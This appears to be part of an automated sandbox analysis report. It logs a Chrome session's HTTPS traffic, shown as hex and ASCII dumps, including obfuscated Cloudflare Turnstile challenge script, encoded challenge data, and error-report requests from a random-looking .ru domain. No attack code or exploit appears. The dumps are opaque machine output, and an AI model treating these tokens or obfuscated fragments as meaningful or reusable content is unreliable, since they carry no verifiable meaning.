                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 57 28 37 38 30 29 5d 28 49 3c 3c 31 2e 37 37 2c 4e 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 57 28 31 31 32 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 57 28 31 32 39 34 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 57 28 31 30 38 39 29 5d 28 31 36 2c 78 29 3b 49 3d 49 3c 3c 31 7c 31 2e 36 36 26 4e 2c 64 5b 67 57 28 38 38 32 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 67 57 28 31 31 32 38 29 5d 28 64 5b 67 57 28 31 30 37 31 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 67 57 28 38 34 36 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 67 57 28 32 31 36 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b
                                                                                                        Data Ascii: W(780)](I<<1.77,N),j-1==J?(J=0,H[gW(1128)](o(I)),I=0):J++,N=0,x++);for(N=D[gW(1294)](0),x=0;d[gW(1089)](16,x);I=I<<1|1.66&N,d[gW(882)](J,j-1)?(J=0,H[gW(1128)](d[gW(1071)](o,I)),I=0):J++,N>>=1,x++);}E--,d[gW(846)](0,E)&&(E=Math[gW(216)](2,G),G++),delete C[
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 26 26 47 2b 2b 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 64 5b 67 57 28 31 34 38 34 29 5d 28 78 2c 47 29 3b 49 3d 4e 26 31 7c 49 3c 3c 31 2c 64 5b 67 57 28 38 34 36 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 67 57 28 31 31 32 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 4a 3d 3d 6a 2d 31 29 7b 69 66 28 64 5b 67 57 28 32 39 38 29 5d 28 67 57 28 31 31 35 31 29 2c 67 57 28 33 33 30 29 29 29 47 28 64 5b 67 57 28 32 34 35 29 5d 29 2c 48 28 67 57 28 31 34 38 39 29 29 3b 65 6c 73 65 7b 48 5b 67 57 28 31 31 32 38 29 5d 28 64 5b 67 57 28 31 30 37 31 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 67 57 28 31 30 30
                                                                                                        Data Ascii: &&G++}for(N=2,x=0;d[gW(1484)](x,G);I=N&1|I<<1,d[gW(846)](J,j-1)?(J=0,H[gW(1128)](o(I)),I=0):J++,N>>=1,x++);for(;;)if(I<<=1,J==j-1){if(d[gW(298)](gW(1151),gW(330)))G(d[gW(245)]),H(gW(1489));else{H[gW(1128)](d[gW(1071)](o,I));break}}else J++;return H[gW(100
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 64 5b 67 5a 28 31 35 36 31 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 5a 28 31 30 39 32 29 5d 28 64 5b 67 5a 28 32 38 37 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 67 5a 28 35 38 38 29 5d 28 65 2c 4a 29 2c 4f 3d 64 5b 67 5a 28 35 36 30 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 5a 28 32 31 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 67 5a 28 31 34 36 35 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 67 5a 28 38 38 32 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 5a
                                                                                                        Data Ascii: d[gZ(1561)](F,K);N=G&H,H>>=1,0==H&&(H=j,G=o(I++)),J|=d[gZ(1092)](d[gZ(287)](0,N)?1:0,F),F<<=1);s[B++]=d[gZ(588)](e,J),O=d[gZ(560)](B,1),x--;break;case 1:for(J=0,K=Math[gZ(216)](2,16),F=1;d[gZ(1465)](F,K);N=G&H,H>>=1,d[gZ(882)](0,H)&&(H=j,G=o(I++)),J|=d[gZ
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 56 27 3a 6e 5b 68 42 28 31 33 34 37 29 5d 5b 68 42 28 39 33 33 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 6f 5b 68 42 28 31 33 34 37 29 5d 5b 68 42 28 31 31 39 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 73 5b 68 42 28 31 33 34 37 29 5d 5b 68 42 28 31 35 34 30 29 5d 2c 27 73 69 74 65 6b 65 79 27 3a 76 5b 68 42 28 31 33 34 37 29 5d 5b 68 42 28 36 38 39 29 5d 2c 27 6d 6f 64 65 27 3a 78 5b 68 42 28 31 33 34 37 29 5d 5b 68 42 28 31 34 37 38 29 5d 7d 2c 27 2a 27 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 32 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 43 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 6b 3d 28 68 43 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 43 28 31 30 34 34 29 5d 3d 68 43 28 36 37 31 29 2c 6a 5b
                                                                                                        Data Ascii: V':n[hB(1347)][hB(933)],'cfChlOut':o[hB(1347)][hB(1198)],'cfChlOutS':s[hB(1347)][hB(1540)],'sitekey':v[hB(1347)][hB(689)],'mode':x[hB(1347)][hB(1478)]},'*')},g)},eM[gJ(231)]=function(g,h,i,hC,j,k,l,m,n,o,s,x,B,C,D,E,F){k=(hC=gJ,j={},j[hC(1044)]=hC(671),j[


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.449767104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:56 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1795432094:1734556335:322H1YIrQj2slam4FeODcquin5MQ5gHchmAe7PwBA_Y/8f4285124e7ede94/8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 3264
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        CF-Chl-RetryAttempt: 0
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: 8n0dW_yaJOogojtbqjjbTmLoURE_15cc_3C5SSfg5VE-1734560212-1.1.1.1-lWRVwntjjfDsvy5HIeez3wv4MTZvn_uf.U_y7hNRvxX6xNFOX2F8zgZyojYyq5vd
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:56 UTC3264OUTData Raw: 76 5f 38 66 34 32 38 35 31 32 34 65 37 65 64 65 39 34 3d 48 41 31 55 79 55 44 55 35 55 6f 55 62 55 6a 49 24 39 49 24 65 32 6b 65 6b 4c 6d 6c 6b 6d 24 6b 32 51 4c 42 6b 35 51 24 53 49 24 51 42 78 24 33 50 55 42 7a 71 65 50 7a 79 73 41 6b 63 24 52 32 44 42 24 56 44 55 24 36 69 24 6d 76 34 24 6c 2d 32 24 4c 31 73 55 53 50 24 34 55 44 79 2d 24 62 49 7a 44 6b 24 57 55 6b 36 32 32 64 4e 4d 4e 24 35 6d 39 4b 50 24 63 79 78 49 68 73 77 6a 36 54 54 59 74 6a 37 7a 57 6a 50 24 65 55 71 42 24 51 55 6f 37 70 2d 6f 79 52 55 6b 37 41 7a 24 42 35 24 39 73 44 6d 39 36 4f 4c 76 6c 24 5a 73 50 31 71 6d 50 24 51 65 51 37 73 55 24 68 55 44 42 24 71 4f 71 42 24 24 25 32 62 24 59 31 24 4e 2d 65 24 58 78 30 47 2b 2d 35 36 4f 6b 50 62 24 71 41 73 45 55 77 2b 24 44 4f 41 74 52 47
                                                                                                        Data Ascii: v_8f4285124e7ede94=HA1UyUDU5UoUbUjI$9I$e2kekLmlkm$k2QLBk5Q$SI$QBx$3PUBzqePzysAkc$R2DB$VDU$6i$mv4$l-2$L1sUSP$4UDy-$bIzDk$WUk622dNMN$5m9KP$cyxIhswj6TTYtj7zWjP$eUqB$QUo7p-oyRUk7Az$B5$9sDm96OLvl$ZsP1qmP$QeQ7sU$hUDB$qOqB$$%2b$Y1$N-e$Xx0G+-56OkPb$qAsEUw+$DOAtRG
                                                                                                        2024-12-18 22:16:57 UTC747INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:57 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 149660
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: OGWuYdpANphk/+Xrk/6W3yizN6NeDM52Q4Otp+J20dEsm1qPEAL0cIl6zK5tNEGq5NDy8JOEPBCZ/xO3p5413hd/jlFs80n/ZygbY+1pPU4EeAX14116wViAUK9cQKssNurTyvOxprXBymxghNHVZ8d3aVG6J2g2THmjG3a1axdteXqztj3l6zAmrXJB8KjbxPNXyRNeZcs+tDIDP3QGpYvSEnSzLUKBAJU9bgmjpfH9m1whlt5s2sdxg0cHNEbGCnf6TK4GLVVcsRdpefprgqWunT3c5S4gLZR96N2DTXsFdf8eqgEuZz8FZdqUvcuCNF9pf9nfM6oP1EVv3JSXF5rF4VGv/IaQ1eJw/TUeMrf+pfhMcRpR/sVQwwrkPn4MvoKVWNv18Ph8COZmQbz761caGzV4PgbyNFQM03oHSx+QCINU7hDr7+0j+oSrn1NiWSamPEHEdqQE2Pq7tcPnm/U7O1/2mJutcUEVUmp6Pj7NluY=$LuWnU/4a0k5v5OXD
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42852b28548c15-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:57 UTC622INData Raw: 54 58 35 6f 62 33 52 66 63 5a 5a 74 59 6c 43 4b 6a 57 6d 53 6d 70 31 79 63 35 65 63 6a 4a 5a 75 6f 4a 70 37 68 33 75 65 6a 70 2b 4c 6f 34 4a 72 72 71 69 47 69 61 75 53 65 5a 4b 57 69 62 43 2b 76 48 6c 2b 6b 71 43 77 6e 35 69 2b 77 5a 66 46 77 62 72 43 72 37 6a 51 75 38 69 6a 31 64 4b 54 71 74 4b 35 74 39 53 53 76 4a 69 64 74 37 44 63 6f 74 47 6a 6e 71 4c 6b 76 4c 65 35 31 4c 7a 4f 72 63 61 6e 30 72 48 4b 78 4f 6d 77 7a 75 71 32 73 65 69 34 31 62 66 65 31 65 48 4f 7a 37 7a 6d 78 75 4c 62 30 2b 6e 34 78 67 6b 49 34 76 33 52 44 4f 62 7a 45 78 48 75 44 4f 2f 6d 46 74 6a 61 37 68 76 34 44 67 38 6b 2f 52 33 79 42 67 59 56 44 52 55 59 48 51 77 6b 4c 52 73 52 45 69 55 67 47 50 44 35 4b 52 55 77 47 44 59 37 51 50 30 41 46 7a 4d 78 47 30 6b 65 48 53 41 56 53 42 77
                                                                                                        Data Ascii: TX5ob3RfcZZtYlCKjWmSmp1yc5ecjJZuoJp7h3uejp+Lo4JrrqiGiauSeZKWibC+vHl+kqCwn5i+wZfFwbrCr7jQu8ij1dKTqtK5t9SSvJidt7DcotGjnqLkvLe51LzOrcan0rHKxOmwzuq2sei41bfe1eHOz7zmxuLb0+n4xgkI4v3RDObzExHuDO/mFtja7hv4Dg8k/R3yBgYVDRUYHQwkLRsREiUgGPD5KRUwGDY7QP0AFzMxG0keHSAVSBw
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 77 73 4f 31 45 64 51 45 70 57 51 6c 31 41 5a 55 35 64 4b 57 30 74 54 43 73 32 54 6d 41 79 5a 7a 56 4f 4e 6d 74 75 64 55 70 69 62 6b 39 63 50 56 46 49 66 33 4a 68 53 6f 64 66 61 32 4e 2b 58 35 52 4e 6b 31 4e 58 6a 32 65 44 57 57 64 55 6c 6d 36 4b 57 35 68 39 58 36 43 6b 57 5a 68 62 64 34 6c 33 62 49 43 5a 72 58 2b 6d 66 61 78 77 6b 59 79 47 6a 6e 69 5a 70 70 57 30 74 72 69 61 66 5a 71 57 75 4b 54 46 6c 49 4f 48 78 73 57 73 6e 4a 2f 44 30 6f 72 46 7a 4a 2b 4f 6a 36 6d 7a 30 37 50 54 71 4a 33 64 73 74 36 59 35 4f 43 6c 6e 4e 6e 61 76 71 72 59 76 72 6a 61 36 63 2b 6e 75 38 33 6d 72 2f 66 56 78 2b 4c 4b 78 37 50 32 74 64 61 36 39 74 48 77 30 4e 7a 47 31 50 33 55 34 4f 6a 6f 2f 73 66 46 37 77 2f 66 45 51 66 6b 7a 4d 2f 6e 37 4f 34 50 30 39 73 64 49 51 6b 67 41
                                                                                                        Data Ascii: wsO1EdQEpWQl1AZU5dKW0tTCs2TmAyZzVONmtudUpibk9cPVFIf3JhSodfa2N+X5RNk1NXj2eDWWdUlm6KW5h9X6CkWZhbd4l3bICZrX+mfaxwkYyGjniZppW0triafZqWuKTFlIOHxsWsnJ/D0orFzJ+Oj6mz07PTqJ3dst6Y5OClnNnavqrYvrja6c+nu83mr/fVx+LKx7P2tda69tHw0NzG1P3U4Ojo/sfF7w/fEQfkzM/n7O4P09sdIQkgA
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 6a 4a 45 31 46 5a 45 64 73 4b 43 6f 76 55 55 35 75 63 57 51 7a 56 54 52 4a 65 48 46 65 66 44 39 61 4e 54 78 42 64 48 4d 36 68 6d 65 44 59 49 65 4d 54 30 70 67 61 55 70 51 54 34 78 79 54 70 4f 4e 68 59 39 36 69 58 74 76 6a 49 2b 51 63 5a 2b 42 68 4a 31 32 65 35 61 66 65 57 71 4f 66 36 75 6a 6e 59 47 69 6f 35 4f 74 6d 59 2b 6e 72 33 64 32 6e 59 39 33 73 48 79 2f 6b 71 36 55 6e 61 47 6d 67 38 72 42 68 35 32 62 6f 61 4b 4b 30 4b 54 54 6a 71 71 58 6a 4c 4c 4f 31 72 7a 58 6b 70 69 59 33 75 54 67 31 4d 43 2b 31 4b 50 71 6f 2b 44 65 77 73 4b 6e 73 4b 76 4e 34 4c 37 6c 7a 62 65 36 38 4f 69 32 2b 4e 6e 74 34 50 6e 35 2f 4f 54 6a 42 39 62 55 41 2b 7a 6e 78 50 6a 68 79 50 33 38 38 66 30 48 44 73 6e 6f 43 65 72 59 45 77 37 5a 39 66 59 54 38 39 7a 57 49 75 4d 47 2f 67
                                                                                                        Data Ascii: jJE1FZEdsKCovUU5ucWQzVTRJeHFefD9aNTxBdHM6hmeDYIeMT0pgaUpQT4xyTpONhY96iXtvjI+QcZ+BhJ12e5afeWqOf6ujnYGio5OtmY+nr3d2nY93sHy/kq6UnaGmg8rBh52boaKK0KTTjqqXjLLO1rzXkpiY3uTg1MC+1KPqo+DewsKnsKvN4L7lzbe68Oi2+Nnt4Pn5/OTjB9bUA+znxPjhyP388f0HDsnoCerYEw7Z9fYT89zWIuMG/g
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 61 47 64 69 51 79 63 78 54 58 5a 54 57 6a 4e 38 55 55 35 57 56 6c 42 57 58 54 74 61 56 49 56 77 66 6c 5a 6a 52 34 68 6b 6a 33 31 67 5a 6d 31 4e 61 6d 53 56 67 33 43 49 55 59 61 59 6c 56 74 76 67 49 2b 52 66 58 36 47 62 32 65 45 6e 70 36 48 65 33 61 41 62 36 32 4b 6a 49 4b 69 71 6f 53 6d 6b 58 47 51 69 4a 32 72 75 72 54 43 6a 4b 36 6b 73 35 36 50 6b 4b 57 5a 77 6f 4c 4e 74 73 54 45 6e 70 72 4f 6f 73 65 6d 7a 4d 57 36 6d 64 47 54 72 37 36 34 30 39 32 79 35 4c 76 68 34 36 57 33 32 4d 76 55 77 62 6a 58 36 4b 2b 75 73 74 4c 49 73 75 62 59 7a 2b 50 31 75 76 7a 57 79 39 76 36 7a 2f 4c 78 75 74 44 77 39 37 34 47 34 39 38 41 33 74 76 71 7a 66 48 4c 44 51 6a 54 45 38 37 74 46 51 66 37 36 52 73 59 31 77 37 64 44 67 54 65 34 4f 59 66 48 2f 67 6d 34 75 6b 64 47 42 45
                                                                                                        Data Ascii: aGdiQycxTXZTWjN8UU5WVlBWXTtaVIVwflZjR4hkj31gZm1NamSVg3CIUYaYlVtvgI+RfX6Gb2eEnp6He3aAb62KjIKiqoSmkXGQiJ2rurTCjK6ks56PkKWZwoLNtsTEnprOosemzMW6mdGTr764092y5Lvh46W32MvUwbjX6K+ustLIsubYz+P1uvzWy9v6z/LxutDw974G498A3tvqzfHLDQjTE87tFQf76RsY1w7dDgTe4OYfH/gm4ukdGBE
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 6b 78 32 4d 55 78 51 4c 30 70 5a 65 6e 70 33 51 54 70 54 64 48 31 5a 61 46 74 42 5a 49 68 66 53 6b 78 35 61 34 46 47 55 4a 5a 31 63 31 42 61 62 6d 56 57 63 31 6d 41 6a 49 74 32 65 47 43 65 66 4a 31 34 67 47 47 44 67 48 6c 2b 73 58 32 68 6f 71 47 71 71 62 43 31 74 72 4b 4e 74 37 57 4c 6e 48 6d 4a 6d 72 75 59 6e 35 64 2f 71 61 4b 58 74 4c 2f 4d 76 63 69 35 71 49 79 7a 7a 63 7a 4f 6a 73 53 68 70 73 4f 70 78 62 4f 58 74 74 6e 42 33 65 54 57 34 38 69 67 33 4c 66 5a 72 4d 32 6d 74 37 6e 76 78 62 37 69 31 63 4f 2f 71 76 66 4e 78 75 62 4f 2b 64 6a 36 76 4d 76 4c 31 72 37 31 42 62 72 49 34 4d 48 55 76 38 73 4a 37 4d 4d 4b 7a 65 73 52 35 78 44 6c 38 51 6a 35 35 52 54 64 36 64 49 65 47 2f 33 64 33 52 45 49 35 79 59 65 2b 76 34 72 47 42 73 6d 43 76 77 44 42 50 41 46
                                                                                                        Data Ascii: kx2MUxQL0pZenp3QTpTdH1ZaFtBZIhfSkx5a4FGUJZ1c1BabmVWc1mAjIt2eGCefJ14gGGDgHl+sX2hoqGqqbC1trKNt7WLnHmJmruYn5d/qaKXtL/Mvci5qIyzzczOjsShpsOpxbOXttnB3eTW48ig3LfZrM2mt7nvxb7i1cO/qvfNxubO+dj6vMvL1r71BbrI4MHUv8sJ7MMKzesR5xDl8Qj55RTd6dIeG/3d3REI5yYe+v4rGBsmCvwDBPAF
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 46 72 58 33 70 56 54 58 70 2b 66 33 64 43 61 56 79 49 64 45 57 41 53 6d 64 71 69 34 4f 4e 64 6f 57 4a 5a 58 4e 51 68 6c 53 51 62 6c 39 31 6d 70 74 74 6e 4a 32 53 6b 34 68 33 67 33 36 6a 64 35 64 37 62 57 71 51 67 33 42 75 62 34 61 77 67 33 69 4d 6a 62 61 30 69 70 65 72 77 4c 36 6b 76 36 57 6d 6d 72 32 61 79 4a 71 2f 7a 38 4b 68 30 61 36 6e 30 38 2b 4f 79 64 50 52 74 4c 43 38 6c 4a 6a 52 75 4b 43 62 32 4d 4f 65 32 64 76 64 76 38 58 4d 36 65 62 48 33 74 72 4d 71 73 7a 47 30 4e 58 75 30 39 66 61 35 66 48 47 30 37 62 68 2f 4c 54 62 39 50 66 78 76 66 45 46 42 4f 6e 64 44 77 2f 73 7a 64 6b 53 38 39 54 76 34 75 6a 77 42 2b 6e 38 46 65 62 70 33 52 62 79 42 50 4c 30 4a 42 49 52 38 53 67 6c 48 53 66 6b 4b 65 34 43 4c 79 38 31 4d 4f 63 7a 38 54 58 33 44 50 51 4f 4f
                                                                                                        Data Ascii: FrX3pVTXp+f3dCaVyIdEWASmdqi4ONdoWJZXNQhlSQbl91mpttnJ2Sk4h3g36jd5d7bWqQg3Bub4awg3iMjba0iperwL6kv6Wmmr2ayJq/z8Kh0a6n08+OydPRtLC8lJjRuKCb2MOe2dvdv8XM6ebH3trMqszG0NXu09fa5fHG07bh/LTb9PfxvfEFBOndDw/szdkS89Tv4ujwB+n8Febp3RbyBPL0JBIR8SglHSfkKe4CLy81MOcz8TX3DPQOO
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 75 65 33 70 2b 64 47 70 67 5a 32 75 46 53 6f 35 71 63 70 42 6c 55 6d 68 52 55 6d 4e 76 6a 31 4b 51 66 49 69 5a 6b 5a 65 57 6a 35 53 59 6d 4b 43 47 61 71 53 46 65 36 75 6d 65 6d 71 4e 71 33 32 31 70 72 65 53 6f 5a 71 35 75 37 6d 78 65 4a 65 55 75 5a 61 38 6c 62 43 31 6c 4c 6d 31 74 34 75 4e 71 63 44 4a 6e 72 4b 38 79 5a 4c 52 76 37 44 49 6d 4c 54 63 33 61 36 31 31 74 76 62 7a 38 53 68 32 4d 53 6b 77 4b 6d 2b 78 4b 50 45 37 36 7a 41 73 4b 2f 70 37 4d 2f 6f 30 76 62 4d 2f 4e 33 4d 2b 37 72 78 76 64 2f 69 37 74 54 78 42 77 6a 71 33 4e 50 6a 39 67 45 48 45 4f 50 73 35 66 58 7a 41 38 6b 54 43 39 59 51 43 78 76 64 31 77 38 44 49 77 33 35 2f 41 4d 66 4a 76 6f 67 35 76 6f 45 35 4f 63 45 2b 7a 45 71 46 67 4c 2b 46 7a 6b 6e 45 7a 6f 48 4f 52 66 34 49 55 41 75 2f 66
                                                                                                        Data Ascii: ue3p+dGpgZ2uFSo5qcpBlUmhRUmNvj1KQfIiZkZeWj5SYmKCGaqSFe6umemqNq321preSoZq5u7mxeJeUuZa8lbC1lLm1t4uNqcDJnrK8yZLRv7DImLTc3a611tvbz8Sh2MSkwKm+xKPE76zAsK/p7M/o0vbM/N3M+7rxvd/i7tTxBwjq3NPj9gEHEOPs5fXzA8kTC9YQCxvd1w8DIw35/AMfJvog5voE5OcE+zEqFgL+FzknEzoHORf4IUAu/f
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 61 6f 32 47 69 31 2b 4d 68 32 5a 69 67 31 47 50 62 6e 52 36 65 59 53 4c 56 70 39 79 6d 6e 46 39 58 6f 47 44 68 49 4e 34 6d 6d 47 74 6e 36 64 72 6f 5a 36 64 6f 32 75 6a 72 36 79 73 74 72 42 37 6c 70 4f 48 66 59 75 63 73 6f 4b 63 6d 4a 32 62 78 37 32 30 71 36 57 36 68 72 6d 65 6e 38 75 6f 73 73 65 2b 31 4d 2f 4e 74 74 71 58 73 71 69 2b 33 37 61 79 30 4c 47 64 34 75 69 67 6f 65 6e 6d 37 4e 58 59 32 65 7a 51 7a 65 4c 4c 7a 39 54 4d 31 64 50 43 31 64 54 4a 75 38 6e 4f 31 4d 48 37 2f 66 6a 47 33 74 62 32 79 4d 4c 63 35 51 51 48 42 50 44 65 2f 75 50 76 35 50 55 54 7a 78 59 49 42 52 33 6e 46 41 45 58 31 50 76 77 49 2f 4d 55 34 2f 51 71 42 79 30 4a 2b 42 33 2b 48 2b 30 4e 4b 6a 45 51 45 6a 66 79 44 7a 59 35 2b 6a 6b 57 4c 41 30 31 47 41 49 66 4f 44 41 43 4f 6b 68
                                                                                                        Data Ascii: ao2Gi1+Mh2Zig1GPbnR6eYSLVp9ymnF9XoGDhIN4mmGtn6droZ6do2ujr6ystrB7lpOHfYucsoKcmJ2bx720q6W6hrmen8uosse+1M/NttqXsqi+37ay0LGd4uigoenm7NXY2ezQzeLLz9TM1dPC1dTJu8nO1MH7/fjG3tb2yMLc5QQHBPDe/uPv5PUTzxYIBR3nFAEX1PvwI/MU4/QqBy0J+B3+H+0NKjEQEjfyDzY5+jkWLA01GAIfODACOkh
                                                                                                        2024-12-18 22:16:57 UTC1369INData Raw: 30 57 49 56 46 36 4a 54 6e 53 50 5a 4a 42 55 69 33 75 63 58 71 42 63 6b 6f 46 7a 66 4b 43 63 6c 70 35 72 6e 58 65 5a 6a 57 79 69 6a 5a 36 30 69 36 53 43 63 62 56 31 68 6e 64 2b 6c 71 78 34 72 61 39 2f 72 58 36 78 6f 59 69 64 69 4a 37 44 6d 4d 71 68 6e 73 36 38 6b 4e 44 4f 6f 61 6e 4c 74 74 65 59 31 74 48 51 72 2b 43 37 76 73 44 4f 73 62 2f 64 76 64 72 4c 35 38 48 65 72 75 48 45 34 72 2f 70 7a 38 50 79 35 38 6e 37 36 2f 76 6e 76 51 44 4f 38 64 50 76 2b 76 62 6e 38 2b 48 36 32 76 76 6d 79 63 41 4a 37 67 51 48 30 78 44 7a 7a 64 50 30 42 4f 6e 58 30 67 77 65 39 2f 6f 53 2f 68 6b 6b 48 68 44 6b 49 69 66 6f 48 43 59 70 4b 43 6a 71 4c 77 62 78 49 42 41 73 43 50 45 4b 47 41 59 56 45 52 30 7a 2f 69 38 34 49 66 34 76 46 44 73 48 4d 78 68 48 54 54 63 64 44 41 73 2b
                                                                                                        Data Ascii: 0WIVF6JTnSPZJBUi3ucXqBckoFzfKCclp5rnXeZjWyijZ60i6SCcbV1hnd+lqx4ra9/rX6xoYidiJ7DmMqhns68kNDOoanLtteY1tHQr+C7vsDOsb/dvdrL58HeruHE4r/pz8Py58n76/vnvQDO8dPv+vbn8+H62vvmycAJ7gQH0xDzzdP0BOnX0gwe9/oS/hkkHhDkIifoHCYpKCjqLwbxIBAsCPEKGAYVER0z/i84If4vFDsHMxhHTTcdDAs+


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.44976835.190.80.14432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:57 UTC537OUTOPTIONS /report/v4?s=MB3F5GHFjzAhajA8l0JYFrdxsEAOEt3MmpxMup5%2Bievq6zfaIrqqtP72Lb2QvwCX9hslIvT5Mwadu8SkE7kordM31A2eRp3yaKTFZcGw7IXRF2hO%2FSMRkm%2BWfLq6sA%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Origin: https://d7m.kczcylvjubu.ru
                                                                                                        Access-Control-Request-Method: POST
                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:57 UTC336INHTTP/1.1 200 OK
                                                                                                        Content-Length: 0
                                                                                                        access-control-max-age: 86400
                                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                                        access-control-allow-origin: *
                                                                                                        access-control-allow-headers: content-type, content-length
                                                                                                        date: Wed, 18 Dec 2024 22:16:57 GMT
                                                                                                        Via: 1.1 google
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.44977135.190.80.14432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:58 UTC476OUTPOST /report/v4?s=MB3F5GHFjzAhajA8l0JYFrdxsEAOEt3MmpxMup5%2Bievq6zfaIrqqtP72Lb2QvwCX9hslIvT5Mwadu8SkE7kordM31A2eRp3yaKTFZcGw7IXRF2hO%2FSMRkm%2BWfLq6sA%3D%3D HTTP/1.1
                                                                                                        Host: a.nel.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 434
                                                                                                        Content-Type: application/reports+json
